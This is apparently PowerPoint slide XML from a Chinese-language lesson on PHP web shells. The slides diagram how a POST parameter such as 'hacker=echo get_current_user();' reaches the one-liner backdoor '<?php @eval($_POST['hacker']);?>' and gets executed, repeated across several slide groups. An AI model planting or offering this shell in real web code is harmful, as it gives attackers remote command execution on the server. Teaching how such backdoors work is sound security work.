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935"/>
    <a:srgbClr val="39ADB5"/>
    <a:srgbClr val="B9E2E5"/>
    <a:srgbClr val="9F7CFF"/>
    <a:srgbClr val="8D64FF"/>
    <a:srgbClr val="92A5AF"/>
    <a:srgbClr val="90A4AE"/>
    <a:srgbClr val="91B859"/>
    <a:srgbClr val="A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B4B38-3134-434B-BF21-32E977669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1CBEB6-B907-4ACF-928B-BE5B14696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FBF3C-B009-4657-9C57-0776CB37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205-9630-418A-91EE-1D7878417DA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C2807-10F1-480E-ADFE-DD645B5C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32518-0474-45BE-B16D-D0B6AA9B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B8D5-267D-4F9D-9BA7-37416DD82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95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7F65D-9262-46E1-9D27-A703940D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E4D9C-0F60-489A-B807-DB1438FF2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CE9DC-DA29-456E-91F6-2E02B112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205-9630-418A-91EE-1D7878417DA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69F62-9FB8-4A4F-89A5-753DC42B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F34CB-CCB5-4668-8B27-E57E9E2A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B8D5-267D-4F9D-9BA7-37416DD82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3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804715-2B05-469C-A997-B2D5E274E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3EC408-C86F-49DF-BBFC-3750E07FD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ACB6E-3633-4578-8498-B775785E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205-9630-418A-91EE-1D7878417DA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A7E3C-5D73-4940-A750-4B50E173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593C4-0019-4F8A-ADED-82BED52A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B8D5-267D-4F9D-9BA7-37416DD82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7DC4D-FFC7-4EE8-9139-9622ABB9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A3665-6C49-429E-85E2-8D8F83D0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D4DFC-5B0B-4A87-A6BA-B25A2041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205-9630-418A-91EE-1D7878417DA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218AE-9F01-4FEF-BAF0-B08CCBAD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061E2-5C4E-471C-A472-68A08D7D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B8D5-267D-4F9D-9BA7-37416DD82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9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AA8B5-6604-4EDF-A5D1-6191715A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15AE29-919B-483D-81CE-51341692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E98BF-A921-479B-8C9B-E06A4299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205-9630-418A-91EE-1D7878417DA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5448A-1066-4DF9-8329-4D0B68AC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3D514-FE45-482F-8C82-DAF6B831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B8D5-267D-4F9D-9BA7-37416DD82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8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35502-B179-4A07-8B24-0D600A03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157BA-82DE-4FFE-8646-3BA5E4EC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B9E203-03D6-42CE-823F-9D77D3B3F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566FC2-88F1-4EE2-A469-4B8E08A1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205-9630-418A-91EE-1D7878417DA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41C69-25A1-4A0C-A8FA-BEB1D09F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26FA9-6375-4D35-A6B1-0F686B4F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B8D5-267D-4F9D-9BA7-37416DD82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7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8CA0E-6C4B-46B2-AFC6-6058884D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53338-D7D5-40CE-BADA-3792288F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496E1-5971-4B42-A235-DF1D3A301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E248BC-E114-4A1F-801A-9CC4BA8CE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82F438-F672-4CA2-B917-4C53B821E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39E6E8-EE74-457F-9503-0821A5C5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205-9630-418A-91EE-1D7878417DA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98C309-E5E6-4D66-AD74-BCB498C3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5FC440-2B3F-4458-BC9A-3A4B53DF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B8D5-267D-4F9D-9BA7-37416DD82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07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90F58-5D7D-40A7-9DEE-29433DA6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3E852B-0850-44BD-A9B3-AC5E4542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205-9630-418A-91EE-1D7878417DA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B82B47-AA32-42AA-8332-58A11F95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8378BF-A339-46EC-A07D-73B0EA8B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B8D5-267D-4F9D-9BA7-37416DD82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3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9AE90B-DCDE-433F-B00B-A93BD693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205-9630-418A-91EE-1D7878417DA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780B30-3042-4DA4-9942-0184554E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899614-ABED-4771-B18F-968C1616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B8D5-267D-4F9D-9BA7-37416DD82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5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2886B-E598-41CB-A706-AA8F723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6FC35-5122-465A-AAA3-3A61922F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68838-D017-4E43-A57A-26D17A86A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2033C-BDE3-45C2-9B7B-AA47D722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205-9630-418A-91EE-1D7878417DA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12C5D-478B-4BFA-9444-50F5E566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C5825-9E8B-4E94-AF45-4DA54BB6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B8D5-267D-4F9D-9BA7-37416DD82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7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58F6-4AC1-4864-AE73-6228402B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48BC1F-4BF5-48D2-A9CF-9931A342E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E882A-9F8C-4B4A-80C2-4DB24D2F3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C5448-8BD9-4329-B462-1CA70EBA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205-9630-418A-91EE-1D7878417DA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AA86AE-1617-4A88-8466-CE9A6DB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96271-B3C7-4E28-BCED-BCE5C6C6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B8D5-267D-4F9D-9BA7-37416DD82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20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81CBEC-20C7-4BFB-9BA3-C29BFA2C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223E3-BE78-49DA-B552-FDEEC7F6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E478E-5CB4-442E-9D61-B73AE7D86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82205-9630-418A-91EE-1D7878417DA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F60B5-05FD-458D-934C-B72A89570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6A3C8-9325-4D7A-8A75-BFDFF643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AB8D5-267D-4F9D-9BA7-37416DD82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9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8584C706-8F83-44D3-AA5F-8658E76F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780" y="3465217"/>
            <a:ext cx="36468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53935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1B859"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'hacker'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形 8" descr="男程序员 轮廓">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97E1A09C-2C12-4FB4-B55B-12DAD2C61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5302" y="1741170"/>
            <a:ext cx="914400" cy="91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1A92AB-27AC-4605-ADDA-A7F41899D662}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5822096" y="2129858"/>
            <a:ext cx="3368084" cy="536027"/>
            <a:chOff x="6274677" y="1474076"/>
            <a:chExt cx="3029601" cy="536027"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="对话气泡: 圆角矩形 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E93486D-8C7D-4E7D-B2B3-7D2FD1341F21}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6274677" y="1474076"/>
              <a:ext cx="2830208" cy="536027"/>
            </a:xfrm>
            <a:prstGeom prst="wedgeRoundRectCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val -33267"/>
                <a:gd name="adj2" fmla="val 69853"/>
                <a:gd name="adj3" fmla="val 16667"/>
              </a:avLst>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="22225">
              <a:solidFill>
                <a:srgbClr val="90A4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4FB686C9-2EF7-4F71-A06E-74155F83D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6813" y="1618979"/>
              <a:ext cx="291746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>
                  <a:solidFill>
                    <a:srgbClr val="91B859"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>“echo </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="91B859"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>get_current_user</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="91B859"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>();”</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="91B85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66D7B2F-FD7C-46A4-8767-DA05C957FBAD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3814617" y="3315855"/>
            <a:ext cx="2713184" cy="544945"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="22225">
            <a:solidFill>
              <a:srgbClr val="90A4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 descr="V 形箭头 轮廓">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DBB0CE02-52CB-4AD3-98FB-D9DCD0463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712691" y="2713182"/>
            <a:ext cx="595745" cy="595745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C6BD985D-38CF-4B17-8476-35E0D098ECF6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5394036" y="4498897"/>
            <a:ext cx="3583709" cy="332509"/>
            <a:chOff x="5163127" y="4157154"/>
            <a:chExt cx="3583709" cy="332509"/>
          </a:xfrm>
        </p:grpSpPr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BD4B5096-CEF5-4136-95BF-8FB6993F8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5723" y="4200298"/>
              <a:ext cx="347851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91B859"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>H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1B859"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>acker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91B859"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>=echo </a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="91B859"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>get_current_user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91B859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40774B4-D898-4E06-9247-5FD8F563D633}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5163127" y="4157154"/>
              <a:ext cx="3583709" cy="332509"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="22225">
              <a:solidFill>
                <a:srgbClr val="90A4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1" name="图形 20" descr="V 形箭头 轮廓">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CCBBD840-78FD-44DA-868A-186EE93C0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712691" y="3876963"/>
            <a:ext cx="595745" cy="595745"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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A013C3E-1C12-4833-B948-3ED6A3A7722E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="4895273" y="3943927"/>
            <a:ext cx="489527" cy="739699"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector2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00326FE-BCAF-47EA-9B94-9C8F52FED54C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4224627" y="3029526"/>
            <a:ext cx="766618" cy="222323"/>
            <a:chOff x="3648364" y="2355273"/>
            <a:chExt cx="766618" cy="646546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5784B8C-8BE5-4EE4-94A0-E4F8103F65E4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3648364" y="2355273"/>
              <a:ext cx="0" cy="646546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A75CA903-B2EB-4305-BB44-CB517ED720EB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4414982" y="2355273"/>
              <a:ext cx="0" cy="646546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32D016C-EE96-48E1-A9A4-3068E296BF96}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3648364" y="2355273"/>
              <a:ext cx="766618" cy="0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91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4479A2-9ECF-412A-8B10-45776BDAFC5A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1450109" y="1163782"/>
            <a:ext cx="9781309" cy="4692073"/>
            <a:chOff x="1450109" y="1163782"/>
            <a:chExt cx="9781309" cy="469207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9E4DBE6-46E3-487E-A2EB-5B62739937C0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1450109" y="1163782"/>
              <a:ext cx="9781309" cy="46920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FEEB1E6-C4CD-409A-8251-A9E11A24B366}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="3342063" y="1964700"/>
              <a:ext cx="5997400" cy="3090236"/>
              <a:chOff x="3192780" y="1741170"/>
              <a:chExt cx="5997400" cy="3090236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8584C706-8F83-44D3-AA5F-8658E76FA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780" y="3465217"/>
                <a:ext cx="3646832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7C4DFF"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>&lt;?php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0A4AE"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t> @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39ADB5"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>eval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0A4AE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E53935"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>$_POST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0A4AE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1B859"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>'hacker'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0A4AE"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>]);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7C4DFF"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>?&gt;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9" name="图形 8" descr="男程序员 轮廓">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97E1A09C-2C12-4FB4-B55B-12DAD2C61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15302" y="174117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1A1A92AB-27AC-4605-ADDA-A7F41899D662}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="5822096" y="2129858"/>
                <a:ext cx="3368084" cy="536027"/>
                <a:chOff x="6274677" y="1474076"/>
                <a:chExt cx="3029601" cy="536027"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="11" name="对话气泡: 圆角矩形 10">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E93486D-8C7D-4E7D-B2B3-7D2FD1341F21}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="6274677" y="1474076"/>
                  <a:ext cx="2830208" cy="536027"/>
                </a:xfrm>
                <a:prstGeom prst="wedgeRoundRectCallout">
                  <a:avLst>
                    <a:gd name="adj1" fmla="val -33267"/>
                    <a:gd name="adj2" fmla="val 69853"/>
                    <a:gd name="adj3" fmla="val 16667"/>
                  </a:avLst>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="22225">
                  <a:solidFill>
                    <a:srgbClr val="90A4A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Rectangle 1">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4FB686C9-2EF7-4F71-A06E-74155F83D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86813" y="1618979"/>
                  <a:ext cx="2917465" cy="246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600" dirty="0">
                      <a:solidFill>
                        <a:srgbClr val="91B859"/>
                      </a:solidFill>
                      <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                    </a:rPr>
                    <a:t>“echo </a:t>
                  </a:r>
                  <a:r>
                    <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                      <a:solidFill>
                        <a:srgbClr val="91B859"/>
                      </a:solidFill>
                      <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                    </a:rPr>
                    <a:t>get_current_user</a:t>
                  </a:r>
                  <a:r>
                    <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                      <a:solidFill>
                        <a:srgbClr val="91B859"/>
                      </a:solidFill>
                      <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                    </a:rPr>
                    <a:t>();”</a:t>
                  </a:r>
                  <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="91B859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E66D7B2F-FD7C-46A4-8767-DA05C957FBAD}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3814616" y="3315855"/>
                <a:ext cx="2713125" cy="544945"/>
              </a:xfrm>
              <a:prstGeom prst="roundRect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="22225">
                <a:solidFill>
                  <a:srgbClr val="90A4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" name="图形 15" descr="V 形箭头 轮廓">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DBB0CE02-52CB-4AD3-98FB-D9DCD0463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5712691" y="2713182"/>
                <a:ext cx="595745" cy="595745"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic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6BD985D-38CF-4B17-8476-35E0D098ECF6}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="5394036" y="4498897"/>
                <a:ext cx="3583709" cy="332509"/>
                <a:chOff x="5163127" y="4157154"/>
                <a:chExt cx="3583709" cy="332509"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="18" name="Rectangle 1">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BD4B5096-CEF5-4136-95BF-8FB6993F8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5723" y="4200298"/>
                  <a:ext cx="3478516" cy="246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>
                      <a:ln>
                        <a:noFill/>
                      </a:ln>
                      <a:solidFill>
                        <a:srgbClr val="91B859"/>
                      </a:solidFill>
                      <a:effectLst/>
                      <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                    </a:rPr>
                    <a:t>H</a:t>
                  </a:r>
                  <a:r>
                    <a:rPr kumimoji="0" lang="zh-CN" altLang="zh-CN" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                      <a:ln>
                        <a:noFill/>
                      </a:ln>
                      <a:solidFill>
                        <a:srgbClr val="91B859"/>
                      </a:solidFill>
                      <a:effectLst/>
                      <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                    </a:rPr>
                    <a:t>acker</a:t>
                  </a:r>
                  <a:r>
                    <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                      <a:ln>
                        <a:noFill/>
                      </a:ln>
                      <a:solidFill>
                        <a:srgbClr val="91B859"/>
                      </a:solidFill>
                      <a:effectLst/>
                      <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                    </a:rPr>
                    <a:t>=echo </a:t>
                  </a:r>
                  <a:r>
                    <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">
                      <a:ln>
                        <a:noFill/>
                      </a:ln>
                      <a:solidFill>
                        <a:srgbClr val="91B859"/>
                      </a:solidFill>
                      <a:effectLst/>
                      <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                    </a:rPr>
                    <a:t>get_current_user</a:t>
                  </a:r>
                  <a:r>
                    <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                      <a:ln>
                        <a:noFill/>
                      </a:ln>
                      <a:solidFill>
                        <a:srgbClr val="91B859"/>
                      </a:solidFill>
                      <a:effectLst/>
                      <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                    </a:rPr>
                    <a:t>();</a:t>
                  </a:r>
                  <a:endPara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640774B4-D898-4E06-9247-5FD8F563D633}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="5163127" y="4157154"/>
                  <a:ext cx="3583709" cy="332509"/>
                </a:xfrm>
                <a:prstGeom prst="roundRect">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="22225">
                  <a:solidFill>
                    <a:srgbClr val="90A4A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pic>
            <p:nvPicPr>
              <p:cNvPr id="21" name="图形 20" descr="V 形箭头 轮廓">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CCBBD840-78FD-44DA-868A-186EE93C0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5712691" y="3876963"/>
                <a:ext cx="595745" cy="595745"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic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CA013C3E-1C12-4833-B948-3ED6A3A7722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895273" y="3943927"/>
                <a:ext cx="489527" cy="739699"/>
              </a:xfrm>
              <a:prstGeom prst="bentConnector2">
                <a:avLst/>
              </a:prstGeom>
              <a:ln w="2222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600326FE-BCAF-47EA-9B94-9C8F52FED54C}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="4224627" y="3029526"/>
                <a:ext cx="766618" cy="222323"/>
                <a:chOff x="3648364" y="2355273"/>
                <a:chExt cx="766618" cy="646546"/>
              </a:xfrm>
            </p:grpSpPr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F5784B8C-8BE5-4EE4-94A0-E4F8103F65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48364" y="2355273"/>
                  <a:ext cx="0" cy="646546"/>
                </a:xfrm>
                <a:prstGeom prst="straightConnector1">
                  <a:avLst/>
                </a:prstGeom>
                <a:ln w="158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A75CA903-B2EB-4305-BB44-CB517ED72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4982" y="2355273"/>
                  <a:ext cx="0" cy="646546"/>
                </a:xfrm>
                <a:prstGeom prst="straightConnector1">
                  <a:avLst/>
                </a:prstGeom>
                <a:ln w="158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232D016C-EE96-48E1-A9A4-3068E296B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48364" y="2355273"/>
                  <a:ext cx="766618" cy="0"/>
                </a:xfrm>
                <a:prstGeom prst="line">
                  <a:avLst/>
                </a:prstGeom>
                <a:ln w="158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8053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 descr="男程序员 轮廓">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97E1A09C-2C12-4FB4-B55B-12DAD2C61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161" y="2002022"/>
            <a:ext cx="914400" cy="91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1A92AB-27AC-4605-ADDA-A7F41899D662}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7426955" y="2390710"/>
            <a:ext cx="3368084" cy="536027"/>
            <a:chOff x="6274677" y="1474076"/>
            <a:chExt cx="3029601" cy="536027"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="对话气泡: 圆角矩形 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E93486D-8C7D-4E7D-B2B3-7D2FD1341F21}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6274677" y="1474076"/>
              <a:ext cx="2830208" cy="536027"/>
            </a:xfrm>
            <a:prstGeom prst="wedgeRoundRectCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val -33267"/>
                <a:gd name="adj2" fmla="val 69853"/>
                <a:gd name="adj3" fmla="val 16667"/>
              </a:avLst>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="22225">
              <a:solidFill>
                <a:srgbClr val="90A4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4FB686C9-2EF7-4F71-A06E-74155F83D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6813" y="1618979"/>
              <a:ext cx="291746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>
                  <a:solidFill>
                    <a:srgbClr val="91B859"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>“echo </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="91B859"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>get_current_user</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="91B859"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>();”</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="91B85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66D7B2F-FD7C-46A4-8767-DA05C957FBAD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5394870" y="3576707"/>
            <a:ext cx="3659870" cy="544945"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="22225">
            <a:solidFill>
              <a:srgbClr val="90A4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6" name="图形 15" descr="V 形箭头 轮廓">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DBB0CE02-52CB-4AD3-98FB-D9DCD0463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7317550" y="2974034"/>
            <a:ext cx="595745" cy="595745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C6BD985D-38CF-4B17-8476-35E0D098ECF6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6998895" y="4759749"/>
            <a:ext cx="3583709" cy="332509"/>
            <a:chOff x="5163127" y="4157154"/>
            <a:chExt cx="3583709" cy="332509"/>
          </a:xfrm>
        </p:grpSpPr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BD4B5096-CEF5-4136-95BF-8FB6993F8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5723" y="4200298"/>
              <a:ext cx="347851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91B859"/>
                  </a:solidFill>
